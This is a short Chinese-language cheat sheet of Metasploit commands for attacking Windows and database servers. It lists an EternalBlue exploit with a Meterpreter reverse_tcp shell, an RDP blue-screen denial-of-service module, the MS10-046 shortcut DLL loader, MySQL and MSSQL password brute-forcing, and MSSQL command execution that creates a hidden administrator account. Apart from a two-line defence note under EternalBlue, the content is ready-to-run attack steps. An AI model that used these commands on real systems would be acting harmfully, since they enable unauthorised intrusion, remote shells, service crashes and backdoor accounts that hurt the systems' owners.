永恒之蓝(ms17-010):

[445端口开启]

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set rhost ip

run

防御：
关闭445端口smb服务(网络共享服务)
开启防火墙，设置445端口处的入站规则连接

 

 

蓝屏攻击(ms12-020):

[3389端口开启]

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

set rhost ip

run

 

 

 

文件共享(ms10-046):

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

set srvhost kaliip

run

 

 

mysql暴力登录:

探测：

use auxiliary/scanner/mysql/mysql_version

set rhosts ip

run

登录：

use auxiliary/scanner/mysql/mysql_login

set rhosts ip

set pass_file  password.txt

set user_file user.txt

run

 

 

 

mssql:

查找mssql端口:

use auxiliary/scanner/mssql/mssql_ping

set rhost ip

run

(也可以用nmap -sV ip，但是效果不行)

mssql暴力破解:

use auxiliary/scanner/mssql/mssql_login

set rhost ip

set pass_file password.txt

set rport x

run

 

mssql命令执行(添加账户):

use auxiliary/admin/mssql/mssql_exec

set rhost ip

set rport

set cmd cmd.exe /c net user test 123 /add

run

set cmd cmd.exe /c net localgroup administrators test /add

run